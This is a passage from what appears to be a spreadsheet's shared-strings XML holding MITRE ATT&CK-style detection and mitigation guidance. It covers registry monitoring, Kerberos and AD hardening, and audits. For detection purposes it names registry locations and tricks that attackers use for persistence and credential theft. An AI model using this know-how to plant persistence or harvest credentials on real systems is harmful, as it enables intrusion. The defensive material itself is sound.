* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys and/or values that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows Registry keys and/or values that adversaries might use to disable or modify System Firewall settings such as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.</t>
  </si>
  <si>
    <t>Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may use a hidden file system to conceal malicious activity from users and security tools.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry key or values for unexpected modifications of the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; key.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor Registry edits for modifications to services and startup programs that correspond to security tools.</t>
  </si>
  <si>
    <t>To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values for unexpected modifications</t>
  </si>
  <si>
    <t>Monitoring changes to the Windows Registry may reveal malicious root certificate installation. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries for password filters (ex: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages`) and correlate then investigate the DLL files these files reference.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys or values that may target multi-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources.</t>
  </si>
  <si>
    <t>Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Collect events related to Registry key modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)</t>
  </si>
  <si>
    <t>Monitor for changes made to the Office Test Registry key. Collect events related to Registry key modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.</t>
  </si>
  <si>
    <t>Monitor for modifications of PATH environment variable Registry keys such as &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path&lt;/code&gt;. An adversary can add a new directory or list of directories before other locations where programs can be executed from.</t>
  </si>
  <si>
    <t>Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to Windows Registry keys and/or values that may be the result of using a virtual instance to avoid detection. For example, if virtualization software is installed by the adversary the Registry may provide detection opportunities. </t>
  </si>
  <si>
    <t>Enable the Registry Global Object Access Auditing (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:(Citation: Microsoft Audit Registry July 2012)
* &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\OID&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust&lt;/code&gt;
* &lt;code&gt;HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust&lt;/code&gt;
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010).(Citation: SpectorOps Subverting Trust Sept 2017)
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Monitor modifications to Registry data associated with enabling safe mode. For example, a service can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t>Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>Monitor for modification of Registry keys and values used by services such as HKLM\SYSTEM\CurrentControlSet\Services that may allow adversaries to launch their own code when a service starts.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring changes to the Windows Registry may reveal malicious attempts to modify trust settings, such as the installation of root certificates. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker) Also consider enabling the Registry Global Object Access Auditing (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:(Citation: Microsoft Audit Registry July 2012) </t>
  </si>
  <si>
    <t>Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys associated with &lt;code&gt;ServiceDll&lt;/code&gt; and other subkey values under &lt;code&gt;HKLM\System\CurrentControlSet\services\TermService\Parameters\&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values modifying W32Time information in the Registry.</t>
  </si>
  <si>
    <t>Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.</t>
  </si>
  <si>
    <t>Enable account restrictions to prevent login attempts, and the subsequent 2FA/MFA service requests, from being initiated from suspicious locations or when the source of the login attempts do not match the location of the 2FA/MFA smart device.</t>
  </si>
  <si>
    <t>Consider adding users to the "Protected Users" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)</t>
  </si>
  <si>
    <t>Manage the access control list for "Replicating Directory Changes" and other permissions associated with domain controller replication.(Citation: ADSecurity Mimikatz DCSync)(Citation: Microsoft Replication ACL)</t>
  </si>
  <si>
    <t>For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. For each domain, change the KRBTGT account password once, force replication, and then change the password a second time. Consider rotating the KRBTGT account password every 180 days.(Citation: STIG krbtgt reset)</t>
  </si>
  <si>
    <t>Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)</t>
  </si>
  <si>
    <t xml:space="preserve">
Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL) Consider adding users to the "Protected Users" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)</t>
  </si>
  <si>
    <t>To contain the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.(Citation: ADSecurity Kerberos and KRBTGT) For each domain, change the KRBTGT account password once, force replication, and then change the password a second time. Consider rotating the KRBTGT account password every 180 days.(Citation: STIG krbtgt reset)</t>
  </si>
  <si>
    <t>For containing the impact of a previously forged SAML token, rotate the token-signing AD FS certificate in rapid succession twice, which will invalidate any tokens generated using the previous certificate.(Citation: Mandiant Defend UNC2452 White Paper)</t>
  </si>
  <si>
    <t>Clean up SID-History attributes after legitimate account migration is complete.
Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e preventing the trusted domain from claiming a user has membership in groups outside of the domain).
SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.
SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)
* Disabling SIDHistory on forest trusts using the netdom tool (&lt;code&gt;netdom trust /domain: /EnableSIDHistory:no&lt;/code&gt; on the domain controller)
* Applying SID Filter Quarantining to external trusts using the netdom tool (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt; on the domain controller)
* Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust</t>
  </si>
  <si>
    <t>Ensure proper system and access isolation for critical network systems through use of group policy.</t>
  </si>
  <si>
    <t>Ensure certificate authorities (CA) are properly secured, including treating CA servers (and other resources hosting CA certificates) as tier 0 assets. Harden abusable CA settings and attributes.
For example, consider disabling the usage of AD CS certificate SANs within relevant authentication protocol settings to enforce strict user mappings and prevent certificates from authenticating as other identifies.(Citation: SpecterOps Certified Pre Owned) Also consider enforcing CA Certificate Manager approval for the templates that include SAN as an issuance requirement.</t>
  </si>
  <si>
    <t xml:space="preserve">Anti-virus can be used to automatically quarantine suspicious files. </t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically detect and quarantine suspicious files.</t>
  </si>
  <si>
    <t>Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.</t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically detect and quarantine suspicious files. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted. (Citation: Microsoft AMSI June 2015)</t>
  </si>
  <si>
    <t>Anti-virus can automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t xml:space="preserve">Employ heuristic-based malware detection. Ensure updated virus definitions and create custom signatures for observed malware. </t>
  </si>
  <si>
    <t>Anti-virus can also automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads.(Citation: Anomali Template Injection MAR 2018)</t>
  </si>
  <si>
    <t>Application developers uploading to public code repositories should be careful to avoid publishing sensitive information such as credentials and API keys.</t>
  </si>
  <si>
    <t>When possible, include hash values in manifest files to help prevent side-loading of malicious libraries.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t xml:space="preserve">Enable the Hardened Runtime capability when developing applications. Do not include the &lt;code&gt;com.apple.security.get-task-allow&lt;/code&gt; entitlement with the value set to any variation of true. </t>
  </si>
  <si>
    <t>Ensure applications are using Apple's developer guidance which enables hardened runtime.(Citation: Apple Developer Doco Hardened Runtime)</t>
  </si>
  <si>
    <t xml:space="preserve">Configure applications to use the application bundle structure which leverages the &lt;code&gt;/Resources&lt;/code&gt; folder location.(Citation: Apple App Security Overview) </t>
  </si>
  <si>
    <t>Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).</t>
  </si>
  <si>
    <t>Ensure all COM alerts and Protected View are enabled.(Citation: Microsoft Protected View)</t>
  </si>
  <si>
    <t>Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist.(Citation: Windows Blogs Microsoft Edge Sandbox)(Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist for these types of systems.(Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>Ensure Protected View is enabled.(Citation: Microsoft Protected View)</t>
  </si>
  <si>
    <t>Consider utilizing seccomp, seccomp-bpf, or a similar solution that restricts certain system calls such as mount. In Kubernetes environments, consider defining a Pod Security Policy that limits container access to host process namespaces, the host network, and the host file system.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Application isolation will limit what other processes and system features the exploited target can access.</t>
  </si>
  <si>
    <t>Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. Risks of additional exploits and weaknesses in those systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist.(Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)</t>
  </si>
  <si>
    <t>Kerberos preauthentication is enabled by default. Older protocols might not support preauthentication therefore it is possible to have this setting disabled. Make sure that all accounts have preauthentication whenever possible and audit changes to setting. Windows tools such as PowerShell may be used to easily find which accounts have preauthentication disabled.  (Citation: Microsoft Preauthentication Jul 2012)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)</t>
  </si>
  <si>
    <t>Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>Administrators should audit all cloud and container accounts to ensure that they are necessary and that the permissions granted to them are appropriate. Where possible, the ability to request temporary account tokens on behalf of another accounts should be disabled. Additionally, administrators can leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>System scans can be performed to identify unauthorized archival utilities.</t>
  </si>
  <si>
    <t>Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit) Windows operating system also creates a registry key specifically associated with the creation of a scheduled task on the destination host at: Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. (Citation: Secureworks - AT.exe Scheduled Task) In Linux and macOS environments, scheduled tasks using &lt;code&gt;[at](https://attack.mitre.org/software/S0110)&lt;/code&gt; can be audited locally, or through centrally collected logging, using syslog, or auditd events from the host. (Citation: Kifarunix - Task Scheduling in Linux)</t>
  </si>
  <si>
    <t xml:space="preserve"> Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.</t>
  </si>
  <si>
    <t>Audit images deployed within the environment to ensure they do not contain any malicious components.</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the ability to list IAM identities or otherwise discover cloud accounts.</t>
  </si>
  <si>
    <t>Consider periodic reviews of accounts and privileges for critical and sensitive code repositories. Scan code repositories for exposed credentials or other sensitive information.</t>
  </si>
  <si>
    <t>Scan public code repositories for exposed credentials or other sensitive information before making commits. Ensure that any leaked credentials are removed from the commit history, not just the current latest version of the code.</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive Confluence repositories.</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to create new instances.</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to create snapshots and backups.</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.</t>
  </si>
  <si>
    <t>Preemptively search for files containing passwords and take actions to reduce the exposure risk when found.</t>
  </si>
  <si>
    <t>Proactively search for credentials within the Registry and attempt to remediate the risk.</t>
  </si>
  <si>
    <t xml:space="preserve">Review changes to the &lt;code&gt;cron&lt;/code&gt; schedule. &lt;code&gt;cron&lt;/code&gt; execution can be reviewed within the &lt;code&gt;/var/log&lt;/code&gt; directory. To validate the location of the &lt;code&gt;cron&lt;/code&gt; log file, check the syslog config at &lt;code&gt;/etc/rsyslog.conf&lt;/code&gt; or &lt;code&gt;/etc/syslog.conf&lt;/code&gt; </t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses.(Citation: Powersploit)
Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-by-side problems in software.(Citation: Microsoft Sxstrace)</t>
  </si>
  <si>
    <t>Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation: Amazon S3 Security, 2019)</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive repositories.</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to delete new instances.</t>
  </si>
  <si>
    <t>Scan images before deployment, and block those that are not in compliance with security policies. In Kubernetes environments, the admission controller can be used to validate images after a container deployment request is authenticated but before the container is deployed.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Consider periodic review of &lt;code&gt;auditpol&lt;/code&gt; settings for Administrator accounts and perform dynamic baselining on SIEM(s) to investigate potential malicious activity. Also ensure that the EventLog service and its threads are properly running.</t>
  </si>
  <si>
    <t xml:space="preserve">Routinely check account role permissions to ensure only expected users and roles have permission to modify cloud firewalls. </t>
  </si>
  <si>
    <t>Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later)(Citation: GitHub Bloodhound).</t>
  </si>
  <si>
    <t>Map the trusts within existing domains/forests and keep trust relationships to a minimum.</t>
  </si>
  <si>
    <t xml:space="preserve">Enterprise email solutions have monitoring mechanisms that may include the ability to audit auto-forwarding rules on a regular basis.
In an Exchange environment, Administrators can use Get-InboxRule to discover and remove potentially malicious auto-forwarding rules.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) </t>
  </si>
  <si>
    <t>Enterprise email solutions have monitoring mechanisms that may include the ability to audit auto-forwarding rules on a regular basis.
In an Exchange environment, Administrators can use Get-InboxRule to discover and remove potentially malicious auto-forwarding rules.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2). In addition to this, a MAPI Editor can be utilized to examine the underlying database structure and discover any modifications/tampering of the properties of auto-forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules)</t>
  </si>
  <si>
    <t>Enterprise email solutions may have monitoring mechanisms that may include the ability to audit inbox rules on a regular basis. 
In an Exchange environment, Administrators can use &lt;code&gt;Get-InboxRule&lt;/code&gt; to discover and remove potentially malicious inbox rules.(Citation: Microsoft Get-InboxRule)</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.(Citation: Powersploit)</t>
  </si>
  <si>
    <t>Administrators should perform an audit of all access lists and the permissions they have been granted to access web applications and services. This should be done extensively on all resources in order to establish a baseline, followed up on with periodic audits of new or updated resources. Suspicious accounts/credentials should be investigated and removed.
Enable advanced auditing on ADFS. Check the success and failure audit options in the ADFS Management snap-in. Enable Audit Application Generated events on the AD FS farm via Group Policy Object.(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t>Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later).(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>Search SYSVOL for any existing GGPs that may contain credentials and remove them.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for hijacking weaknesses.(Citation: Powersploit)
Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.
Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)</t>
  </si>
  <si>
    <t>Periodically review the hybrid identity solution in use for any discrepancies. For example, review all PTA agents in the Azure Management Portal to identify any unwanted or unapproved ones.(Citation: Mandiant Azure AD Backdoors) If ADFS is in use, review DLLs and executable files in the AD FS and Global Assembly Cache directories to ensure that they are signed by Microsoft. Note that in some cases binaries may be catalog-signed, which may cause the file to appear unsigned when viewing file properties.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Regularly check installed IIS components to verify the integrity of the web server and identify if unexpected changes have been made.</t>
  </si>
  <si>
    <t>Periodically check the integrity of images and containers used in cloud deployments to ensure they have not been modified to include malicious software.</t>
  </si>
  <si>
    <t>Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn\u2019t included as part of an update, it should be investigated.</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting folder permissions abuse opportunities on systems, especially reviewing changes made to folders by third-party software.</t>
  </si>
  <si>
    <t>Review authentication logs to ensure that mechanisms such as enforcement of MFA are functioning as intended.
Periodically review the hybrid identity solution in use for any discrepancies. For example, review all Pass Through Authentication (PTA) agents in the Azure Management Portal to identify any unwanted or unapproved ones.(Citation: Mandiant Azure AD Backdoors) If ADFS is in use, review DLLs and executable files in the AD FS and Global Assembly Cache directories to ensure that they are signed by Microsoft. Note that in some cases binaries may be catalog-signed, which may cause the file to appear unsigned when viewing file properties.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.</t>
  </si>
  <si>
    <t>Review MFA actions alongside authentication logs to ensure that MFA-based logins are functioning as intended.</t>
  </si>
  <si>
    <t>Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)</t>
  </si>
  <si>
    <t>Ensure only authorized keys are allowed access to critical resources and audit access lists regularly.</t>
  </si>
  <si>
    <t>Inventory systems for unauthorized Python installations.</t>
  </si>
  <si>
    <t>Audit the Remote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups.</t>
  </si>
  <si>
